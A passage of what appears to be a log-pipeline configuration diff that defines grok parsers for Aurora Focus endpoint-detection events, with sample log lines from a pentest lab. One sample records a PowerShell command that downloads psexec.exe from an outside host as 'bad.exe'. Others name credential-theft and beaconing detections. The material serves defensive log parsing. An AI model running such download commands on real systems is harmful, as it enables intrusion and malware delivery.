Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (39BFDA7FEF71490584AAB4F163142350), Detection Rule Id: + 3f110342-88f8-11ec-a8a3-0242ac120002, Instigating Process Command + Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process + File Path: c:\\windows\\system32\\cmd.exe, Target Process Name: + powershell.exe, Target Process Owner: PENTEST//Administrator, + Target Process ImageFileSha256: + BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436, + Device Id: 3514593e-7405-4319-8ca5-8ec876bf0195, Target Process + Command Line: powershell -command \"(new-object + SYstem.Net.WebClient).DownloadFile('https://zaphod.cnerds.net/inf\ + ection/psexec.exe', 'C:\\dver\\bad.exe')\", Target Process File + Path: + c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_process_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA2:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Target Process + Name: %{PARSE_TILL_COMMA2:target_process_name}, Target Process + Owner: %{PARSE_TILL_COMMA2:target_process_owner}, Target Process + ImageFileSha256: (%{notSpace:target_process_imagefilesha256})?, + Device Id: (%{notSpace:device_id})?, Target Process Command Line: + %{PARSE_TILL_COMMA:target_process_command_line}, Target Process + File Path: (%{notSpace:target_process_file_path})?' + - type: pipeline + name: Processing Aurora Focus File Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeFileEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus File Based Detection Events + enabled: true + source: additional_details + samples: + - 'Device Name: ADMIN, Zone Names: (Windows Zone (Default)), Event + Id: 3013d82e-6b4c-4677-a334-3fd4934fed7f, Severity: Informational, + Description: Win Browser CredTheft Mitre T1003, Instigating + Process Name: msedge.exe, Instigating Process Owner: admin//test, + Instigating Process ImageFileSha256: + 2C853AA78C45045C540668AC2EE63407CEF02EE55BFAFD6F678EC9E84EC23CBA, + Event Timestamp: 2025-11-19T09:45:11.336Z, Event Received + Timestamp: 2025-11-19T09:45:17Z, Device Last Reported Users: + (admin\test1,admin\test,Window Manager\DWM-1,Window + Manager\DWM-2,Window Manager\DWM-3), Zone Ids: + (E79C47BC6292419DBD0AE117798FB355), Detection Rule Id: + 26cadfe8-1b8c-489c-ae29-115b5bc9d592, Instigating Process Command + Line: "C:\Program Files + (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility + --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US + --service-sandbox-type=none --skip-read-main-dll + --metrics-shmem-handle=5020,i,3478498035652716424,1717516754338292010,524288 + --field-trial-handle=2372,i,11122849255781664600,8070874040734229388,262144 + --variations-seed-version + --trace-process-track-uuid=3190708991934122588 + --mojo-platform-channel-handle=5012 /prefetch:14, Instigating + Process File Path: c:\program files + (x86)\microsoft\edge\application\msedge.exe, Target File Path: + c:\users\test\appdata\local\google\chrome\user data\default\login + data for account, Target File Owner: admin//test, Target File + Sha256: hduy64t8459u59590i95923099, Device Id: 191c967b-264c-46c3-999b-94c071e2e790' + - 'Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + f4739af7-9c8b-4dc0-aeb7-2d4533445d49, Severity: Medium, + Description: SYSLOG detections - Looking for a created file + cylancetest.txt, Instigating Process Name: cmd.exe, Instigating + Process Owner: PENTEST//Administrator, Instigating Process + ImageFileSha256: + BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527, + Event Timestamp: 2022-06-28T18:09:32.693Z, Event Received + Timestamp: 2022-06-28T18:09:36Z, Device Last Reported Users: + (PENTEST\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), + Detection Rule Id: 74bd0e7e-281a-4d7b-9f84-d0f51346782c, + Instigating Process Command Line: "C:\Windows\system32\cmd.exe" , + Instigating Process File Path: c:\windows\system32\cmd.exe, Target + File Path: + c:\users\administrator.pentest\downloads\syslog_test_cae_rules\cylancetest.txt, + Target File Owner: BUILTIN//Administrators, Target File Sha256: hduy64t8459u59590i95923099, + Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954' + - 'Device Name: ADMIN, Zone Names: (Windows Zone (Default),test + Devices), Event Id: c259013f-7294-41c4-8d5a-426dfd117d68, + Severity: Informational, Description: Win Browser CredentialTheft + Mitre T1003, Instigating Process Name: chrome.exe, Instigating + Process Owner: admin//test, Instigating Process ImageFileSha256: + 5186B823F4E174B13B9F60BB76ED89FE8FD44487B34B79DFE283275A13BD948B, + Event Timestamp: 2025-11-26T15:55:36.812Z, Event Received + Timestamp: 2025-11-26T15:55:54Z, Device Last Reported Users: + (admin\test,Window Manager\DWM-1,Window Manager\DWM-2), Zone Ids: + (E79C47BC6292419DBD0AE117798FB353,8F852781BD6E413285B0CD324F055674), + Detection Rule Id: d935a7df-2114-442f-a44a-728485ff1cc5, + Instigating Process Command Line: "C:\Program + Files\Google\Chrome\Application\chrome.exe" , Instigating Process + File Path: c:\program files\google\chrome\application\chrome.exe, + Target File Path: c:\users\test\appdata\local\google\chrome\user + data\default\preferences~rf24ba61f2.tmp, Target File Owner: + admin//test, Target File Sha256: hduy64t8459u59590i95923099, Device Id: + 191c967b-264c-46c3-999b-94c071e2e790' + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_file_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Target File + Path: %{PARSE_TILL_COMMA2:target_file_path}, Target File Owner: + %{PARSE_TILL_COMMA2:target_file_owner}, Target File Sha256: + (%{notSpace:target_process_imagefilesha256})?(, Device Id: + %{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus Registry Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeRegistryEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Registry Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + 6d33d636-dcdc-48c2-911a-ead99ac17f88, Severity: Medium, + Description: SYSLOG detections - RegistryKey + \\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlex\ + t, Instigating Process Name: ICreatePersistencePoints.exe, + Instigating Process Owner: PENTEST//Administrator, Instigating + Process ImageFileSha256: + F83926AB855E860C9B1A6D72EB6024D9E1D569A59E4901A62E8543B1C978D5E5, + Event Timestamp: 2022-06-28T18:08:49.103Z, Event Received + Timestamp: 2022-06-28T18:08:54Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: 74354415-7d28-4f31-830d-72a14c0c3d8b, + Instigating Process Command Line: ICreatePersistencePoints.exe + --trigger 0, Instigating Process File Path: + c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\ + \\icreatepersistencepoints.exe, Target Registry KeyPath: + HKLM\\software\\classes\\*\\shellex\\contextmenuhandlers\\cywares\ + hlext, Target Registry ValueName: Unknown, Device Id: + c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_registry_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id}), Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Target + Registry KeyPath: %{PARSE_TILL_COMMA2:target_registry_keypath}, + Target Registry ValueName: + %{PARSE_TILL_COMMA2:target_registry_valuename}, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus Network Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeNetworkEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Network Based Detection Events + enabled: true + source: additional_details + samples: + - 'Device Name: ADMIN, Zone Names: (Windows Zone (Default)), Event + Id: fbc31190-9974-48b9-956c-5e080bd6ad5b, Severity: Low, + Description: Unsigned Application Network Beaconing, Instigating + Process Name: FXAALZ.exe, Instigating Process Owner: admin//test, + Instigating Process ImageFileSha256: + F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45BC, + Event Timestamp: 2025-11-19T09:52:15.782Z, Event Received + Timestamp: 2025-11-19T09:52:22Z, Device Last Reported Users: + (admin\test1,admin\test,Window Manager\DWM-1,Window + Manager\DWM-2,Window Manager\DWM-3), Zone Ids: + (E79C47BC6292419DBD0AE117798FB356), Detection Rule Id: + 6ab20572-8eb4-41a8-a8ea-d16766de0e47, Instigating Process Command + Line: "C:\CPZIVC\FXAALZ.exe" -f C:\CPZIVC\NGHVQE, Instigating + Process File Path: c:\cpzivc\fxaalz.exe, Destination IP: + 142.202.51.69, Destination Port: 9006, Device Id: + 191c967b-264c-46c3-999b-94c071e2e797, Source IP: 192.168.90.24, + Source Port: 61130' + - "Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + 23a04c4c-1a97-4a58-b4bc-fadadb729e37, Severity: Medium, + Description: SYSLOG detections - Looking for NetworkConnection + 8.8.8.8, Instigating Process Name: ICreateNetworkConnections.exe, + Instigating Process Owner: PENTEST//Administrator, Instigating + Process ImageFileSha256: + F816E73FFAD0CA8684B6E44292276DD9B9CB8890ABAA732A7AEB283B46D32003, + Event Timestamp: 2022-06-28T18:09:56.392Z, Event Received + Timestamp: 2022-06-28T18:10:00Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: fdac76c9-5c6b-4b6f-8062-e074457afe3e, + Instigating Process Command Line: ICreateNetworkConnections.exe + --sequential 8.8.8.8, Instigating Process File Path: + c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\ + \\icreatenetworkconnections.exe, Destination IP: 8.8.8.81, + Destination Port: 29281, Device Id: + c7b79f9f-4fbe-4f90-9658-ec7e17af1954, Source IP: 192.168.254.102, + Source Port: 52912" + - 'Device Name: ADMIN, Zone Names: (Windows Zone (Default),test + Devices), Event Id: c202bf55-4a24-4f8a-9922-f4627db91f8a, + Severity: Low, Description: Unsigned Application Network + Beaconing, Instigating Process Name: FXAALZ.exe, Instigating + Process Owner: admin//test, Instigating Process ImageFileSha256: + F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45Bb, + Event Timestamp: 2025-11-26T13:58:04.424Z, Event Received + Timestamp: 2025-11-26T13:58:21Z, Device Last Reported Users: + (admin\test,Window Manager\DWM-1,Window Manager\DWM-2), Zone Ids: + (E79C47BC6292419DBD0AE117798FB358,8F852781BD6E413285B0CD324F055676), + Detection Rule Id: 6ab20572-8eb4-41a8-a8ea-d16766de0e43, + Instigating Process Command Line: "C:\CPZIVC\FXAALZ.exe" -f + C:\CPZIVC\NGHVQE, Instigating Process File Path: + c:\cpzivc\fxaalz.exe, Destination IP: 45.9.156.106, Destination + Port: 8438, Device Id: 191c967b-264c-46c3-999b-94c071e2e793, + Source IP: 192.168.90.24, Source Port: 10067' + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_network_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Destination + IP: (%{ip:network.destination.ip})?, Destination Port: + (%{port:network.destination.port})?, Device Id: + (%{notSpace:device_id})?, Source IP: (%{ip:network.client.ip})?, + Source Port: (%{port:network.client.port})?' + - type: geo-ip-parser + name: Extracting Geo Location from Client IP Address + enabled: true + sources: + - network.client.ip + target: network.client.geoip + ip_processing_behavior: do-nothing + - type: geo-ip-parser + name: Extracting Geo Location from Destination IP Address + enabled: true + sources: + - network.destination.ip + target: network.destination.geoip + ip_processing_behavior: do-nothing + - type: pipeline + name: Processing Aurora Focus Memory Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeMemoryEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Memory Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,Jeff_3.0), + Event Id: c4e7d4e1-8739-4996-83a3-19d9ba583882, Severity: Medium, + Description: Looking for a protect memory event, Instigating + Process Name: AttackTest32.exe, Instigating Process Owner: + PENTEST/Administrator, Instigating Process ImageFileSha256: + 2762CB5818C67BDD28DFE88FB528EF06B0C1AB5C175E2206B49C85BB8672C2EC, + Event Timestamp: 2022-07-21T12:55:02.277Z, Event Received + Timestamp: 2022-07-21T12:55:25Z, Device Last Reported Users: + PENTEST\\Administrator, Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: edf530c6-6b0e-4be2-aeb6-d3f8001fce05, + Instigating Process Command Line: AttackTest32.exe -p:8000, + Instigating Process File Path: + c:\\users\\administrator.pentest\\downloads\\attacktest\\attackte\ + st32.exe, Device Id: e378dacb-9324-453a-b8c6-5a8406952195" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_memory_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus DNS Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeDnsEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus DNS Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + 6458f3ac-e527-4922-83ac-654518c3137e, Severity: Medium, + Description: Win_Suspicious_DNSLength_MitreT1071, Instigating + Process Name: lsass.exe, Instigating Process Owner: NT + AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: + 91EAB6178A9BB2B268E7438E54B128F939C0BDF5BD8AC8B15EFCAF0572AADC3F, + Event Timestamp: 2022-06-28T17:34:12.772Z, Event Received + Timestamp: 2022-06-28T17:34:33Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: 0da4f7c3-af0d-46be-8f6b-1884a1c67331, + Instigating Process Command Line: + C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: + c:\\windows\\system32\\lsass.exe, Target Domain Name: + 7f2a98df-486e-4cec-8d6e-c227073955e6._msdcs.Pentest.Local., + Resolved Address: securityserver.Pentest.Local, Resolved Address + Count: 1, Device Id: 41666e82-50e6-4777-88b6-5f2b567027b9" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_dns_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Target Domain + Name: %{PARSE_TILL_COMMA2:dns.question.name}, Resolved Address: + %{PARSE_TILL_COMMA2:resolved_address}, Resolved Address Count: + (%{integer:resolved_address_count})?, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus Log Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeLogEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Log Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + ba8810a9-afac-4579-82a2-638f0f584d60, Severity: High, Description: + Win_CreateAccount_MitreT1136, Instigating Process Name: lsass.exe, + Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating + Process ImageFileSha256: + BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F, + Event Timestamp: 2022-06-28T18:17:05.001Z, Event Received + Timestamp: 2022-06-28T18:17:10Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: 266e750f-a838-4974-9afc-20cb863031cc, + Instigating Process Command Line: + C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: + c:\\windows\\system32\\lsass.exe, Windows Event Id: 4720, Security + Provider: SecurityAuditProvider, Device Id: + c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_log_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Windows Event + Id: (%{notSpace:windows_event_id})?, Security Provider: + %{PARSE_TILL_COMMA2:security_provider}, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus Powershell Trace Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaePowershellTraceEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Powershell Trace Based Detection Events + enabled: true + source: additional_details + samples: + - 'Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + 4b199c5c-60dc-4b5c-8dac-86965ba5b051, Severity: Medium, + Description: SYSLOG detections - Looking for PowershellTrace + get-childitem, Instigating Process Name: powershell.exe, + Instigating Process Owner: PENTEST//Administrator, Instigating + Process ImageFileSha256: + DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C, + Event Timestamp: 2022-06-28T18:10:39.547Z, Event Received + Timestamp: 2022-06-28T18:10:43Z, Device Last Reported Users: + (PENTEST\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), + Detection Rule Id: 9eb1073c-913f-49ab-9b12-2e5a28dad18d, + Instigating Process Command Line: powershell gwmi -class + win32_process, Instigating Process File Path: + c:\windows\system32\windowspowershell\v1.0\powershell.exe, Script + Block Text: + @{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft + Corporation"CompanyName="Micros, Script Block Length: 2583, + Payload: None, Payload Length: 0, Device Id: + c7b79f9f-4fbe-4f90-9658-ec7e17af1954' + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_powershell_trace_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, Zone Names: + %{PARSE_TILL_COMMA:zone_names}, Event Id: (%{notSpace:event_id})?, + Severity: (%{notSpace:severity})?, Description: + %{PARSE_TILL_COMMA2:description}, Instigating Process Name: + %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating Process + Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, Instigating + Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Script Block + Text: %{PARSE_TILL_COMMA2:script_block_text}, Script Block Length: + (%{integer:script_block_length})?, Payload: + %{PARSE_TILL_COMMA2:payload}, Payload Length: + (%{integer:payload_length})?, Device Id: (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus WMI Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeWmiEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus WMI Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: JEFWILLIAMS-1, Zone Names: (JeffTesting,Jeff_3.0), + Event Id: 9fa208e5-779d-40b1-b4e2-44c330600396, Severity: Medium, + Description: SYSLOG detections - Looking for WmiTrace select, + Instigating Process Name: WmiPrvSE.exe, Instigating Process Owner: + NT AUTHORITY//NETWORK SERVICE, Instigating Process + ImageFileSha256: + B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15, + Event Timestamp: 2022-06-28T18:09:55.613Z, Event Received + Timestamp: 2022-06-28T18:09:57Z, Device Last Reported Users: + (RIMNET\\jefwilliams), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,24362CB3F25D4EB59C03FD6E3800C20\ + E), Detection Rule Id: f83b1ac8-b966-4297-be47-bb893bf23f2d, + Instigating Process Command Line: + C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe-secured-Embedding, + Instigating Process File Path: + c:\\windows\\system32\\wbem\\wmiprvse.exe, Consumer Text: None, + Consumer Text Length: 0, Operation: Start + IWbemServices::CreateInstanceEnum - root\\Standardcimv2 : + MSFT_NetIPAddress, Operation Length: 80, Device Id: + c6246140-bba5-4c55-be02-77300bf91dbc" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_wmi_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Consumer Text: + %{PARSE_TILL_COMMA2:consumer_text}, Consumer Text Length: + (%{integer:consumer_text_length})?, Operation: + %{PARSE_TILL_COMMA2:operation}, Operation Length: + (%{integer:operation_length})?, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus API Sensor Based Detection Events + enabled: true + filter: + query: "@evt.name:OpticsCaeApiEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus API Sensor Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER3, Zone Names: (ZoneOne,ZoneTwo), + Event Id: d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1, Severity: High, + Description: Test - API Sensor, High priority event, Instigating + Process Name: IReadCredentials.exe, Instigating Process Owner: + PENTEST//Administrator, Instigating Process ImageFileSha256: + E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56, + Event Timestamp: 2022-09-28T14:23:37.384Z, Event Received + Timestamp: 2022-09-28T14:24:30Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9, + Instigating Process Command Line: IReadCredentials.exe, + Instigating Process File Path: + c:\\apisensor\\ireadcredentials.exe, API DLL: Advapi32.dll, API + Function: CredEnumerateW, API Parameters: Unknown" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 